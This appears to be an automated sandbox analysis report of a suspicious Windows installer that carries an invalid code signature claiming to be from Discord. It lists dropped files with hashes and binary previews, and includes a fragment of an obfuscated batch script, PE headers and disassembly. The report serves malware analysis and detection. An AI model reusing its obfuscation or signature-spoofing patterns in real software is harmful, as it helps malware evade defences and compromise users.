                                                                                                        SHA1:E4603F73D1289C0DA115E8D7F95D7C78CACA232E
                                                                                                        SHA-256:CEEAA6AD552BA0189F32C51153C882A9772E6FC3D7D1D9A632106348840FABDE
                                                                                                        SHA-512:CE5E9A2F6E63ABC12D32D2CC88203B73C2B968D485701749EA8FA9C762794AB7059F396DAA3E78AA2B238D1FECCC0BE929198CBFF79A46EBC17F71405C066BB2
                                                                                                        Malicious:false
                                                                                                        Preview:.......'`+.."w..U,[....9]|...i.......K.....;......?h......KqR.Tw..yM..D...W..G.....?q=..0.=..@........"..|1...Z...m!G_...............{e..0.CV.C..dN(.8sv....q.....4S..0.V.s...V ^..........D.9.x..|...'t..1.....lf..4..2_.&}B(N...:R.......R0.Q>.O..c|M...H.:..zgR.d..C....X....y.V...N...f^...:.9.%kLd ........|....6.<D..@.q.........m...l...>.r*.:..U.....v......k.f...kQ..Qx3.$...[;..^o...F.?'.".(...p{'|..>..Y...$y..P..H..i"..\j.?....!A............f..Tw...,m.,....V..:u.c/<.i..d...<d.H.m..a.K.c.]n..kwo(.T|m....8d...[..JGs.,=....*.n.4..6i\.e....-....n..l..o..h&8..@..6W.........\..b$..K...K../...r.....ii...e....5.vVa.J3....RbJ|.7` ^...s..{..'1..ycW....-.....D...$7.....8.W.K.W!,U..!..[7...U..JK..<..L@.......j..?}v..V(.L.eOQ.P.l>.q..Z6.Y.2...(o...D............v*....F.....A..Wt0.....,..7.K.r$..`.~Q/#(.._..T.)KX_...piV$.-.@..e.$....1.....~.K......].rP....,.k.`.).....?R.A..fTY.....6.mC.J<...Up.t...T.>...)....Yo"...._.......F....>(.....e.......{Y..^b...4KHi..
                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):145408
                                                                                                        Entropy (8bit):4.790182743077724
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:A/mex/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtVSQsbZgar3R/OWel3EYr8qL:QPdKaj6iTcPAsAhxjgarB/5el3EYrf
                                                                                                        MD5:849DA478EC3B54458595EBC4797F5A03
                                                                                                        SHA1:C88AA82B39FB85D77801370B5DCA64A01CEF7293
                                                                                                        SHA-256:9F080E2CB1C50C9646279CB6943BBF35016E61C89F5437EBFE32466109AAA291
                                                                                                        SHA-512:BFEABD47308F352A5FABAA04E443A7D6A7A7E94F99D443E6B01D229D6DF2B6D718C3651FA115405EBA8D1CC22B2D0003F4B6F25AAC631EF4F662D1DBE89451DB
                                                                                                        Malicious:false
                                                                                                        Preview:...k...................................m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.n.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.o.p.o.p.k.q.o.p.r.r.s.t.t.t...u.r.r.r.r.q...v...w.w.w.r.x.r.y.y.z.{.|.{.{.}.{.{.~.....{...{.{.{.....r...{.{...{.{...{.{.........z...............................................................................o.p.o.p.o.p.o.p.o.p...........................................o.p...o.p.z.................................................................................................................................................................................................................................................................................m.m....................................................................................................................................................................................
                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):68608
                                                                                                        Entropy (8bit):6.329823926458593
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:FZPp7HE+tKA3QkvyNf7Xw2U0pkzUWBh2zGc/xv5mjKul:zxyA3laW2UDQWf05mjV
                                                                                                        MD5:B212537407FE3AEA1F37210F2C97FB34
                                                                                                        SHA1:46029A7BD80781BF385138EC72A3AA0017B63119
                                                                                                        SHA-256:0F88EFBB006B3B8924CB853643F944C7D1BC0E16162A8C9BB82483E8D65A4306
                                                                                                        SHA-512:9D314912490B65F2933967A3350A42FD7B378ACA42D7449F05B0C1D1E9CBD79601C9939E71445AD918054314D02FE43CED13E0AA3B60953653751D53EE76A8FC
                                                                                                        Malicious:false
                                                                                                        Preview:J...<.L...A...@.L.......D.L.......H.L.......L.L.....f..P.L.....T.L...I...`.L..o@...d.L.......h.L.......l.L.......p.L.....f..t.L.....x.L...I.....L.{.G.....L.........L.........L.........L.....f....L.......L...I.....L..G.....L.........L.........L.........L.....f....L.......L.d.I.....L.z.G.....L.........L.........L.........L.....f....L.......L...I.....L..G.....L.........L.........L.........L.....f....L.......L...I.....L..G.....L.........L....... .L.......$.L.....f..(.L.....,.L.t.I...8.L.5.G...<.L.......@.L.......D.L.......H.L.....f..L.L.....P.L...J...\.L...G...`.L.......d.L.......h.L.......l.L.....f..p.L.....t.L.0.J.....L.j.G.....L.........L.........L.........L.....f....L.......L.x.I.....L..G.....L.........L.........L.........L.....f....L.......L.`.J.....L...G.....L.........L.........L.........L.....f....L.......L.|.I.....L.3.G.....L.........L.........L.........L.....f....L.......L...J.....L...G.....L.........L.........L....... .L.....f..$.L.....(.L...I...4.L...G...8.L.......<.L.......
                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):137216
                                                                                                        Entropy (8bit):6.668271513419496
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:MBRtNPnj0nEoXnmowS2u5hVOoQ7t8T6pUkBJR8CThpmESvV:GNPj0nEo3tb2j6AUkB0CThp6vV
                                                                                                        MD5:5ED11C4B626451B04C76471C60785363
                                                                                                        SHA1:1FA1BED97199F5366176A4F3E61552323102ACAE
                                                                                                        SHA-256:2601FBCBC756E49DD60F311B322BF80A6F1C7F4137C263097C5BF67162433AE2
                                                                                                        SHA-512:2D0D5193E7BEE25DDD703BF59F6753838A279E72BCA8EB64FF384B0D94221015152631A0EA3BF8F8881140FEBF389C27769040A212EDA2326925DBC9CEE88AD4
                                                                                                        Malicious:false
                                                                                                        Preview:........VPW.]...U.....j.Y...E.f......x.f.....E.f.....B!f......"..;E...."...}...].t%......t............VPW.5]...U.....f.....>.u..x..E.f.1...j.f..X..E..y.+E..E....j...........B%f..Y.Z".............SPW..\.....j.Y.S"...E........Pwnt)j.Y;.......j Y;.v.j)Y;.t...6t.jCY;........}......1L..E...H.M.tsf.A......f#.....f;.u].A....M..E...I...H.E..Fj][;.t.jm[;.v8jo[;.v.jpXf;.u)..E.".!.E.j.Y..@.f;.t.j.Yf;.t.j...j.X.E..M...+..........!.....jv^;.s....[L...t....f...].u.3..u(f...u..M.j.^.......E.......WP...P.t...U..N....j.X..E.jxf...K.Xf....f....E..U.f.H..u...!..3..E...E.t..}..u..M...M..j...j.Yf......#...E(.@`......[....E...@....B....U..E...........j.f..f#.....f;...O....u.f..^f.........;.....D...9U.t'.....;.v..................U....M.......M.f........f.......U.........F 3.+F..u......j<_.u.f9>.V.j>...E.K.U.X........j+Y.].f;.t#j-Yf;.t.j0Yf;.r.j9Yf;.v..E.E..o....~......f;.p...r!j.[j9Zf;.w........f;.p...s.U..].f9.........u....j+X...M.].f;........r.j0.u....Zf;.r.j9Zf;.v..E.j?Z........r..u
                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):129024
                                                                                                        Entropy (8bit):6.657813209880497
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:a4CE0Imbi80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHF:fClbfSCOMVIPPL/sZ7HS3zJ
                                                                                                        MD5:1BF9441983742C8780AB9CBEA7CECD89
                                                                                                        SHA1:43D35EC6EAC2236590A4E1CAFE9561C55E56D010
                                                                                                        SHA-256:AE0BDB2202869D1B4A823AF93EEB97E1A6A2A0C2D44DFAF91F690BACC1B33DDD
                                                                                                        SHA-512:2DD2A71B448DA383AEFC47B0127752BD17246993D5149298248E9EA2B052E24E49D1A6303DD14632388FB7235D11FFBAEDC0793F4EC96DF19F24F9E8173A7C42
                                                                                                        Malicious:false
                                                                                                        Preview:.E....}..t.....J.....p.J.[...u*;.~&....!W..I.....E.Yt..4...J....4.l.J..u kE$<.E(k.<.E,i......E0.}..u..5..L....L..=..L._^..]...L..E.P.5..L.....Y..uDiE.........L......L.y....\&.....L.....\&.;.|.+.....L.....L..=..L..j.j.j.j.j..n....U....SV......e....e...E.P.]..B...Y.........E.P.....Y..........."M..u...t4....:.u...t..X.:Y.u.........u.3............D....].R..o..Y..Q...A..u.+.A.P."~..j..."M..o....."M.YY..........W.y...A..u.+.V.A.PR.n.............j._WVj@.3.................>.t.F...u..>-_....t.FV...Yi......M...<+t.<0|.<9..F..>:uBFV...k.<Y.M...M...<9..F..<0}..>:u.FV.a...Y.M...M...<9..F..<0}...t...M.3.8.....E...E.t.j.Vj@.p..N........t.. .@.....u..M....0.u..7....0^[..].3.PPPPP..l....U....SV.%.....3.E..].P.]..]..m...Y...."....E.P.....Y.........E.P.....Y.........5."M..4n....."M...$."M.....I..........k.."M.<..l"M.W3.G.=."M..M.f9.^"M.t.k.<..M.f9.."M.t..."M...t.+.}.k.<.E....]..].. ......E.PSj?.6j.h."M.SW....I...t.9].u....X?.......E.PSj?.v.j.hp"M.SW....I._..t.9].u..F..X?...F.
                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):81920
                                                                                                        Entropy (8bit):6.48430304300997
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:g1/AD1EsdzVXnP94SGGLpRB6M28eFvMVpYhWoXElJUzdlDfFgQa8BpDzP:gZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/P
                                                                                                        MD5:AE602F582EC8B5D0D56CC531D658DF4B
                                                                                                        SHA1:85D748AE045139B463146C412436E4B95D03B350
                                                                                                        SHA-256:CA490CCA0A853ED6F00F791A65E61AA478154968259B06E8D6CEEDA76D006D67
                                                                                                        SHA-512:19A05A40539685A1EB1346476337E0E0A8D44128A609F94551E070F82C5051ABF1A93E978A573D1BFDA2F2627ADCE7BB747E849CF0E8221B52E0B54BD9AC4775
                                                                                                        Malicious:false
                                                                                                        Preview:........................t.M.....hi'D......Y.hs'D......Y..r...hx'D......Y..|X..h}'D......Y.Q.I...h.'D.....Y.0$M.Q.@..0$M.P.=B..h.'D.....Y...C..h.'D.....Y.....h.'D..}...Y..+O..h.'D..l...Y..!...h.'D..[...Y.45M....h.'D..E...Y.U....SVW.}.....e....E..E..w..E..E.E.E............v..G..H..z....E....v..G..H..g....E....v..O..I..T....E...v..O..I..A....E...v..O..I.......E...v..O..I.......E..O..1...?}...u..N..u..u..u..u..u..u..1........p.....u.........F.....3._..^[....U..V.u.3.W.~....p....N.j.j.P..j.j....Pj......u..........>3._.F.....^]...SV..3.Wj._.N...N(...^..^..~..^..^..^ .^$.4......f.^8.Nl.F:..^<.^@.FL.FP.FT.FX.F\.F`.Fd.....j....................F|U............[............u......3........................l.....p.....t.....x.....|...........................f.............................................................._......^[.U..SV..j.[.F.9F.u0...j.X;.sF3.F...W.......Q......~....Y.......~._S.....Y.M......V..N.....F.^[]......U..QQ.}..........L)M....tv.}.........@)M.3.
                                                                                                        Process:C:\Users\user\Desktop\installer_1.05_37.4.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):65536
                                                                                                        Entropy (8bit):7.9976739929059475
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:1536:fvm/E2nMLHsLIwkhwZJO5NJsgeOj63m074r7hncr7gOQgRnTp:fvm/E2nMLHsL36VVkN4r1qnt
                                                                                                        MD5:36DA83A9B17EB16AFCAB4FCE116634BA
                                                                                                        SHA1:E5F806CE81683A7B12D6AFCB900A440224C3FFBA
                                                                                                        SHA-256:EAF7F69ED7CC6190D37788A127613EC90D3F9AD822B1F913E90CBF1B32613A6E
                                                                                                        SHA-512:250A6D82F1D2488808FED88F23CD83F6C45504B190CB5606DF6FEC628C9667357D2A850ED4631C6A9090B9105DD6646930552CFDC0437C2164B1E5439144B0F4
                                                                                                        Malicious:false
                                                                                                        Preview:.P..2I*...|;.!*.$..^....TF.kP..8.......@...O.I.W.....}...........:......W.......<r.9@i........D].:S..v8.iYC:.k..:.O..(u.%........6.[.!..{.M#..%......^.I..[.....b.K...}D.....p....W.F.!y.LH......~.....f...[1...7.Q.?=i..2.f.|x.X\.Xv.e.7...?.=.......9...G.....?.Z_c._..m..~. ...6!wz."xT3.KD...&Co.t.9.Z.p..b.I......o.`k.lI@..6K.C.....Y<.Ij..L..hf..H..6.....M.(.x..$.o.J.;....;.....;..th.\PZ..:.Y.$.<....%_...........>6....(.FE....(....&..5{.7.......PO.A)h.I.YR..G..+.X.~.2od>.J.v..`'.j.....TL5.4.:.....u+..Y..z@.....t.mZY.{8w..Z..zGF:....@L..b...`\...k:.4...h.:-..<..,z....#..V.WV...w.....U..7.OB..,..O...{.U.7..u..l[w~[q@.].fk......X...jG4.yZ.\.V.HFj).I...(r.W.vJ.}..@....H.9....r.=..<.[d.a"....D.$...@.....u..b..P.v..?v.o.Y(...=rf.........g(.z.>..I(..;....i.5Xg..&........J\~~5...w........GN...a...$.UI.pv....6...^...RZ.yc)...dw...*.A...m.u.m.J....*..?{.V..f..\^......?....6o.D.....:{..J...%...X...K@..c~=.........5h..._<.r$.i.o....:6...1..5.0
                                                                                                        Process:C:\Users\user\Desktop\installer_1.05_37.4.exe
                                                                                                        File Type:ASCII text, with very long lines (741), with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):15873
                                                                                                        Entropy (8bit):5.135834123615694
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:eAlA42zCSxNVhjR/w53gQOrD9j0egmPkFm8yaRPuO2eZsF:eOA42hz9Zw5wQOrd9qRPuO2euF
                                                                                                        MD5:63515F866844B279CEF96864CB3348C0
                                                                                                        SHA1:2276F6B26044EB3FF252FAB4ECE7A52B47B1E37C
                                                                                                        SHA-256:56331384E114B80D7F259411EF2B64C412206B5AD0680321F15387E37472CC7C
                                                                                                        SHA-512:E3DF3CC2E447538009851F233C74FB54F51C3462647090824CC63043B872D3BB545AAB11E65288681811A1346D34A3A7FA72A0A5E3DF5857B59BABB7A2846630
                                                                                                        Malicious:false
                                                                                                        Preview:Set Filing=i..MfVitamins-Plaza-Record-Jewish-Relationship-Purchased-Rolls-Combining-..cXldIslam-Lift-Agrees-Obvious-Tight-Training-Denmark-Like-..bFrTRr-Latinas-Ins-Certificate-Strategies-..CoaDeviation-Ottawa-Congo-Applies-Ir-Displayed-Vault-..dKeBeat-Onion-Staffing-Ghana-..Set Secretariat=j..pNXtFire-Responsibility-Installations-Teens-..CUlERon-Honey-Kilometers-Interview-Debut-Canon-..xFAdHoldem-Implies-Eg-Termination-Cherry-Evans-Zimbabwe-Dir-..AdrFinishing-Screen-Lauderdale-Satin-..PwEGrow-Namespace-J-Statistical-Dividend-No-..asDLaws-..qEGirls-..ldeBoard-Holes-Alerts-..Set Brain=F..RsInventory-Pass-..pKTMai-Diploma-Even-Cork-Urgent-Sample-Antenna-Browser-Fur-..lRAuthentic-Viewing-..LQOrganizing-Legs-..uvMCopyright-Vitamins-Delivers-Stereo-Mothers-Logan-Annual-..feComplicated-..AnIContacting-Spam-Aaron-Chubby-Biodiversity-Length-Monitor-Str-French-..Set Brooklyn=h..hVDiscussed-Beings-..LlTnVariation-..LoKlAta-Dept-..vGbIHazardous-Employ-Senate-Leaves-Cake-Jr-Processing-..NpRidge-..
                                                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                        File Type:ASCII text, with very long lines (741), with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):15873
                                                                                                        Entropy (8bit):5.135834123615694
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:eAlA42zCSxNVhjR/w53gQOrD9j0egmPkFm8yaRPuO2eZsF:eOA42hz9Zw5wQOrd9qRPuO2euF
                                                                                                        MD5:63515F866844B279CEF96864CB3348C0
                                                                                                        SHA1:2276F6B26044EB3FF252FAB4ECE7A52B47B1E37C
                                                                                                        SHA-256:56331384E114B80D7F259411EF2B64C412206B5AD0680321F15387E37472CC7C
                                                                                                        SHA-512:E3DF3CC2E447538009851F233C74FB54F51C3462647090824CC63043B872D3BB545AAB11E65288681811A1346D34A3A7FA72A0A5E3DF5857B59BABB7A2846630
                                                                                                        Malicious:false
                                                                                                        Preview:Set Filing=i..MfVitamins-Plaza-Record-Jewish-Relationship-Purchased-Rolls-Combining-..cXldIslam-Lift-Agrees-Obvious-Tight-Training-Denmark-Like-..bFrTRr-Latinas-Ins-Certificate-Strategies-..CoaDeviation-Ottawa-Congo-Applies-Ir-Displayed-Vault-..dKeBeat-Onion-Staffing-Ghana-..Set Secretariat=j..pNXtFire-Responsibility-Installations-Teens-..CUlERon-Honey-Kilometers-Interview-Debut-Canon-..xFAdHoldem-Implies-Eg-Termination-Cherry-Evans-Zimbabwe-Dir-..AdrFinishing-Screen-Lauderdale-Satin-..PwEGrow-Namespace-J-Statistical-Dividend-No-..asDLaws-..qEGirls-..ldeBoard-Holes-Alerts-..Set Brain=F..RsInventory-Pass-..pKTMai-Diploma-Even-Cork-Urgent-Sample-Antenna-Browser-Fur-..lRAuthentic-Viewing-..LQOrganizing-Legs-..uvMCopyright-Vitamins-Delivers-Stereo-Mothers-Logan-Annual-..feComplicated-..AnIContacting-Spam-Aaron-Chubby-Biodiversity-Length-Monitor-Str-French-..Set Brooklyn=h..hVDiscussed-Beings-..LlTnVariation-..LoKlAta-Dept-..vGbIHazardous-Employ-Senate-Leaves-Cake-Jr-Processing-..NpRidge-..
                                                                                                        Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):73839
                                                                                                        Entropy (8bit):7.1167728551531
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:1536:7Wyu0uZo2+9BGmdATGODv7xvTphAiPChgZ2kOE6:7Wy4ZNoGmROL7F1G7ho2kOb
                                                                                                        MD5:BA4BD6472D1F50FF03BEBBBAAE89B22C
                                                                                                        SHA1:29DB7366A8DB226219C1DE45D2B7DF6265730331
                                                                                                        SHA-256:0EBC95D7954ABA8429745ED50884CD0629673BE34386AA7C0CBAC5A9A5B7AA02
                                                                                                        SHA-512:943B54ACA2D2AC1400A21EEDA356A34FCC1C85F93A3716423D169FFA0693BB7EB61FE4B0A4F99BECD8AEE7F944A3E4840542464788D87AEB8ACFF93FCBC43037
                                                                                                        Malicious:false
                                                                                                        Preview:.Ej..O..j;....Z..q.MU...<...=.........1....v...*.:.....y<...#..g.>.0.m.\U.AD...kx.>(..U..c........G.[..MUMR-..........56T.K"..E.[...Nu.....MU.....GEd....C.6p..kU.........l....!.?.|.j.N.[.......YU}>.H\....1;;..........k...9....O...l.f.-K..|>c..?...B.C.K.y..X.yU./.a.E,..........W.=.i.:........|..a...\.D"%.....l.UD>.|.x.[... ^..?Q./l...!......0~....2.C.Y.(..Q.l..R.l,[)Wll...\......}.....R.i.>..4..i........m.<.U...|..H.{...(..-.m.P....Ts..4J....2..%V.K...YY/.]..Vbu.D.R5..eS.m..*..*...Ak. 5.7.!.3...70...i.3..... .. ........DB~".....E......m.~#.L.{............(..T.Y/V.._frq......u..6J...E.lQ,W(U....u[0...I._...>Z.&....h.T....0...B.-[U.....=..x<........k.D".$"?.........ln...e.....SX+Q.X....\H.Y=B.|&.....1....:"t&...`...Z..?...Q....C..B..m....d.{1e.X..V.p}:..,.s,-o`..}G......X8.pO....;..>Z.>|..4.ATU..e..eY.....@}].A....'h...e..V".Z..L.7..36[.X..%.A.I.g...)..b..-DB......Z..m..i..b.X.#.......a....~....+.e..k.]..d...e...T..)[.3.........&.HGI.B.C.f..5.K.gT..
                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                        Entropy (8bit):7.973899368678375
                                                                                                        TrID:
                                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                        File name:installer_1.05_37.4.exe
                                                                                                        File size:1'120'175 bytes
                                                                                                        MD5:a2e9824e77be1fbc29913ffd0b324823
                                                                                                        SHA1:42dd1e05ec49639d9d8ad318e732a66a1451fd6f
                                                                                                        SHA256:34c3a5d70230d93968cc2db047398cef644fb500740bbc20d09feb8e754ae197
                                                                                                        SHA512:d42a7f8c2d032a46dd664e6941c3496359ecc865d7a5394c782ecfd66fbd17b9bfefa1671068c869803c99cb9e00553242286c71b180341e003299d64ff4ed8c
                                                                                                        SSDEEP:24576:eAp1czyvnORvabmyJFMwOQ75wWkGR+1FaFEddGuL9NfSvtzH:lczyvORiRJxwJ1FYxG2lzH
                                                                                                        TLSH:A4352341CEE8A8AEDCD34D7D24630A178A37B6961CB4C2EF3700DD8639753416D397AA
                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L...X|.N.................n.......B...8.....
                                                                                                        Icon Hash:7c347ccccc8cc8cc
                                                                                                        Entrypoint:0x403883
                                                                                                        Entrypoint Section:.text
                                                                                                        Digitally signed:true
                                                                                                        Imagebase:0x400000
                                                                                                        Subsystem:windows gui
                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                        Time Stamp:0x4E807C58 [Mon Sep 26 13:21:28 2011 UTC]
                                                                                                        TLS Callbacks:
                                                                                                        CLR (.Net) Version:
                                                                                                        OS Version Major:5
                                                                                                        OS Version Minor:0
                                                                                                        File Version Major:5
                                                                                                        File Version Minor:0
                                                                                                        Subsystem Version Major:5
                                                                                                        Subsystem Version Minor:0
                                                                                                        Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                                                                        Signature Valid:false
                                                                                                        Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                        Signature Validation Error:The digital signature of the object did not verify
                                                                                                        Error Number:-2146869232
                                                                                                        Not Before, Not After
                                                                                                        • 24/09/2024 02:00:00 25/09/2027 01:59:59
                                                                                                        Subject Chain
                                                                                                        • CN=Discord Inc., O=Discord Inc., L=San Francisco, S=California, C=US, SERIALNUMBER=5128862, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.2=Delaware, OID.1.3.6.1.4.1.311.60.2.1.3=US
                                                                                                        Version:3
                                                                                                        Thumbprint MD5:5D2A3557A29B3D769CD29535A5E3D35D
                                                                                                        Thumbprint SHA-1:6C7552617E892DFCA5CEB96FA2870F4F1904820E
                                                                                                        Thumbprint SHA-256:77E85A01A656323340749C2D61FA129C86DA12533CAC6A4FCF2C81C9D8D63A40
                                                                                                        Serial:0DE9CF2E718364A0062E0D83093E34D7
                                                                                                        Instruction
                                                                                                        sub esp, 000002D4h
                                                                                                        push ebx
                                                                                                        push ebp
                                                                                                        push esi
                                                                                                        push edi
                                                                                                        push 00000020h
                                                                                                        xor ebp, ebp
                                                                                                        pop esi
                                                                                                        mov dword ptr [esp+18h], ebp
                                                                                                        mov dword ptr [esp+10h], 00409268h
                                                                                                        mov dword ptr [esp+14h], ebp
                                                                                                        call dword ptr [00408030h]
                                                                                                        push 00008001h
                                                                                                        call dword ptr [004080B4h]
                                                                                                        push ebp
                                                                                                        call dword ptr [004082C0h]
                                                                                                        push 00000008h
                                                                                                        mov dword ptr [00472EB8h], eax
                                                                                                        call 00007FB8FCB118EBh
                                                                                                        push ebp
                                                                                                        push 000002B4h
                                                                                                        mov dword ptr [00472DD0h], eax
                                                                                                        lea eax, dword ptr [esp+38h]
                                                                                                        push eax
                                                                                                        push ebp
                                                                                                        push 00409264h
                                                                                                        call dword ptr [00408184h]
                                                                                                        push 0040924Ch
                                                                                                        push 0046ADC0h
                                                                                                        call 00007FB8FCB115CDh
                                                                                                        call dword ptr [004080B0h]
                                                                                                        push eax
                                                                                                        mov edi, 004C30A0h
                                                                                                        push edi
                                                                                                        call 00007FB8FCB115BBh
                                                                                                        push ebp
                                                                                                        call dword ptr [00408134h]
                                                                                                        cmp word ptr [004C30A0h], 0022h
                                                                                                        mov dword ptr [00472DD8h], eax
                                                                                                        mov eax, edi
                                                                                                        jne 00007FB8FCB0EEBAh
                                                                                                        push 00000022h
                                                                                                        pop esi
                                                                                                        mov eax, 004C30A2h
                                                                                                        push esi
                                                                                                        push eax
                                                                                                        call 00007FB8FCB11291h
                                                                                                        push eax
                                                                                                        call dword ptr [00408260h]
                                                                                                        mov esi, eax
                                                                                                        mov dword ptr [esp+1Ch], esi
                                                                                                        jmp 00007FB8FCB0EF43h
                                                                                                        push 00000020h
                                                                                                        pop ebx
                                                                                                        cmp ax, bx
                                                                                                        jne 00007FB8FCB0EEBAh
                                                                                                        add esi, 02h
                                                                                                        cmp word ptr [esi], bx
                                                                                                        Programming Language:
                                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                                        • [IMP] VS2008 SP1 build 30729
                                                                                                        • [ C ] VS2010 SP1 build 40219
                                                                                                        • [RES] VS2010 SP1 build 40219
                                                                                                        • [LNK] VS2010 SP1 build 40219
                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000xdf12.rsrc
                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x10ee370x2978
                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                        .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                        .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                        .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                        .rsrc0xf40000xdf120xe0000f8e1efd7d78e9262551f823113980c6False0.8749128069196429data7.500514899491219IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                        .reloc0x1020000xf320x1000e28dac45941a93ec616f8d1c4c70de5bFalse0.599609375data5.52646656481944IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                        RT_ICON0xf42500x7617PNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0005292580463763
                                                                                                        RT_ICON0xfb8680x2514PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.001158870627897
                                                                                                        RT_ICON0xfdd7c0x2668Device independent bitmap graphic, 48 x 96 x 32, image size 9792EnglishUnited States0.57740032546786
                                                                                                        RT_ICON0x1003e40x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.6372950819672131
                                                                                                        RT_ICON0x10150c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.7703900709219859
                                                                                                        RT_DIALOG0x1019740x100dataEnglishUnited States0.5234375
                                                                                                        RT_DIALOG0x101a740x11cdataEnglishUnited States0.6056338028169014
                                                                                                        RT_DIALOG0x101b900x60dataEnglishUnited States0.7291666666666666
                                                                                                        RT_GROUP_ICON0x101bf00x4cdataEnglishUnited States0.8026315789473685
